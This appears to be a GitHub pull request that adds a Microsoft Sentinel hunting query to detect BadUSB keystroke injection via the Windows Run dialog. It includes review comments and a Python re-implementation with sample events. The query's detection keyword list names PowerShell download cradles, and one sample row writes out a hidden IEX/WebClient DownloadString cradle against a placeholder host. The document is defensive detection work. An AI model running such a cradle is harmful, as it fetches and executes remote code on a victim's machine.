Add BadUSB PowerShell Run dialog hunting query (HID injection)#14336
Open
descambiado wants to merge 1 commit into
Conversation
Adds a DeviceProcessEvents hunting query that detects PowerShell spawned by explorer.exe with -WindowStyle Hidden and any remote execution or evasion flag, consistent with HID injection payloads using WIN+R. MITRE ATT&CK: T1059.001, T1564.003, T1200
Contributor
Pull request overview
Note
Copilot was unable to run its full agentic suite in this review.
Adds a new Microsoft Sentinel hunting query to identify likely BadUSB/HID keystroke-injection activity that launches PowerShell via the Windows Run dialog, focusing on explorer.exe parentage plus hidden window + cradle/evasion flags.
Changes:
- Introduces a new hunting query YAML targeting DeviceProcessEvents (MDE).
- Adds MITRE ATT&CK tactics/techniques, entity mappings, and solution metadata fields for the query.
Comment on lines +4 to +8
| Identifies PowerShell spawned by explorer.exe with a hidden window and remote | ||
| execution or evasion flags, consistent with BadUSB HID injection payloads that | ||
| open the Windows Run dialog via WIN+R. Keystroke injection via hardware sets | ||
| explorer.exe as the parent; pairing -WindowStyle Hidden with any cradle flag is | ||
| a reliable indicator of automated injection rather than interactive user activity. |
| @@ -0,0 +1,70 @@ | |||
| id: 683b2baa-39c3-457d-b64e-2e57c8fc83ba | |||
| name: BadUSB PowerShell execution via Windows Run dialog (HID injection) | |||
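Review bot: the claim on lines +7 to +8 that pairing -WindowStyle Hidden with a cradle flag is "a reliable indicator of automated injection rather than interactive user activity" needs a caveat in the description: a desktop or Start-menu shortcut whose target is `powershell.exe -WindowStyle Hidden -NoProfile -File ...` is also launched with explorer.exe as the parent and will match the same filters, so suggest stating that known launcher shortcuts should be baselined or excluded before treating a hit as HID injection.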
Comment on lines +23 to +33
| let EvasionFlags = dynamic([ | ||
| "-NoProfile", | ||
| "-NonInteractive", | ||
| "-EncodedCommand", | ||
| "-ExecutionPolicy Bypass", | ||
| "DownloadString", | ||
| "IEX", | ||
| "Invoke-Expression", | ||
| "WebClient", | ||
| "Start-Process" | ||
| ]); |
| | where FileName in~ ("powershell.exe", "pwsh.exe") | ||
| | where InitiatingProcessFileName =~ "explorer.exe" | ||
| | where ProcessCommandLine has_all ("-WindowStyle", "Hidden") | ||
| | where ProcessCommandLine has_any (EvasionFlags) |
| support: | ||
| tier: Community | ||
| categories: | ||
| domains: [ "Security - Threat Protection", "Endpoints" ] |
| "WebClient", | ||
| "Start-Process" | ||
| ]); | ||
| DeviceProcessEvents |
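Review bot: the `| where ProcessCommandLine has_all ("-WindowStyle", "Hidden")` filter shown after the EvasionFlags block only matches the fully spelled parameter name; powershell.exe accepts abbreviated parameter names such as `-w hidden` or `-win hidden`, and `has_all` does not require the two terms to be adjacent, so either extend the match to cover the documented short forms of -WindowStyle or state in the description that only the long form is covered. The same applies to `"-ExecutionPolicy Bypass"` in EvasionFlags, which will not match the `-ep bypass` spelling.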
Comment on lines +49 to +60
| | sort by TimeGenerated desc | ||
| entityMappings: | ||
| - entityType: Account | ||
| fieldMappings: | ||
| - identifier: Name | ||
| columnName: AccountName | ||
| - identifier: NTDomain | ||
| columnName: AccountDomain | ||
| - entityType: Host | ||
| fieldMappings: | ||
| - identifier: HostName | ||
| columnName: DeviceName |
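Review bot: the Host entity mapping on lines +57 to +60 maps only HostName to DeviceName, but DeviceName in the MDE DeviceProcessEvents table is the device's fully qualified domain name, so consider projecting the short host name and domain separately and adding a DnsDomain identifier so the Host entity resolves cleanly in Sentinel.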
Collaborator
Hi @descambiado,
Description
Adds a hunting query that detects PowerShell spawned by explorer.exe with a hidden window and remote execution or evasion flags, consistent with BadUSB / HID injection payloads that open the Windows Run dialog via WIN+R.

When a hardware keystroke injector (Flipper Zero, Rubber Ducky, etc.) uses WIN+R to launch a command, the resulting process has explorer.exe as its parent. Pairing -WindowStyle Hidden with any cradle flag is a reliable indicator of automated injection rather than interactive user activity.

Detection logic
- DeviceProcessEvents (Microsoft Defender for Endpoint)
- explorer.exe
- powershell.exe or pwsh.exe
- has_all("-WindowStyle", "Hidden") AND has_any of 9 evasion/cradle flags
- (timeframe variable)

MITRE ATT&CK

Files changed
Hunting Queries/MultipleDataSources/BadUSBPowerShellRunDialog.yaml

Testing
Rule validated end-to-end against a Flipper Zero BadUSB payload. Companion SIGMA rule contributed to SigmaHQ (PR #6028). Source payload and forensic breakdown: https://github.com/descambiado/flipper-purple-team/tree/main/badusb/01-windows-powershell-run-dialog
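To show how the detection logic described above behaves on individual DeviceProcessEvents rows, here is an added Python re-implementation of the query's four conditions; it is not code from the PR, and it approximates KQL term matching (`has`, `has_all`, `has_any`) as case-insensitive runs of alphanumeric characters, run over constructed sample rows.

```python
import re
from dataclasses import dataclass

# Same nine flags as the EvasionFlags list in the query under review.
EVASION_FLAGS = [
    "-NoProfile", "-NonInteractive", "-EncodedCommand", "-ExecutionPolicy Bypass",
    "DownloadString", "IEX", "Invoke-Expression", "WebClient", "Start-Process",
]


def terms(text):
    # Assumption: KQL term matching approximated as case-insensitive runs of
    # alphanumerics, so "-WindowStyle" becomes the single term "windowstyle".
    return [t.lower() for t in re.findall(r"[A-Za-z0-9]+", text)]


def has(text, phrase):
    # KQL `has`: every term of `phrase` occurs as a consecutive run of whole terms
    # in `text`, so "IEX" does not match "iexplore" (approximation, see above).
    hay, needle = terms(text), terms(phrase)
    return any(hay[i:i + len(needle)] == needle for i in range(len(hay) - len(needle) + 1))


def has_all(text, phrases): return all(has(text, p) for p in phrases)
def has_any(text, phrases): return any(has(text, p) for p in phrases)


@dataclass
class ProcessEvent:  # the three DeviceProcessEvents columns the query filters on
    FileName: str
    InitiatingProcessFileName: str
    ProcessCommandLine: str


def is_badusb_run_dialog(ev):
    # Mirrors the four `| where` clauses of the query, in order.
    return (ev.FileName.lower() in ("powershell.exe", "pwsh.exe")
            and ev.InitiatingProcessFileName.lower() == "explorer.exe"
            and has_all(ev.ProcessCommandLine, ["-WindowStyle", "Hidden"])
            and has_any(ev.ProcessCommandLine, EVASION_FLAGS))


def hunt(events):
    return [e for e in events if is_badusb_run_dialog(e)]


# Constructed sample rows; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcessEvent("powershell.exe", "explorer.exe",
                 "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                 "-Command \"IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER.invalid/p')\""),
    ProcessEvent("powershell.exe", "explorer.exe",  # user opened PowerShell from the Start menu
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    ProcessEvent("powershell.exe", "cmd.exe",  # hidden window, but the parent is not explorer.exe
                 r"powershell.exe -WindowStyle Hidden -NoProfile -File C:\Scripts\backup.ps1"),
    ProcessEvent("pwsh.exe", "explorer.exe", "pwsh.exe -NoProfile"),  # evasion flag, no hidden window
]
```

Only the first constructed row satisfies all four clauses; the other three each fail exactly one, which is a quick way to check that a change to the query has not widened or narrowed it unintentionally.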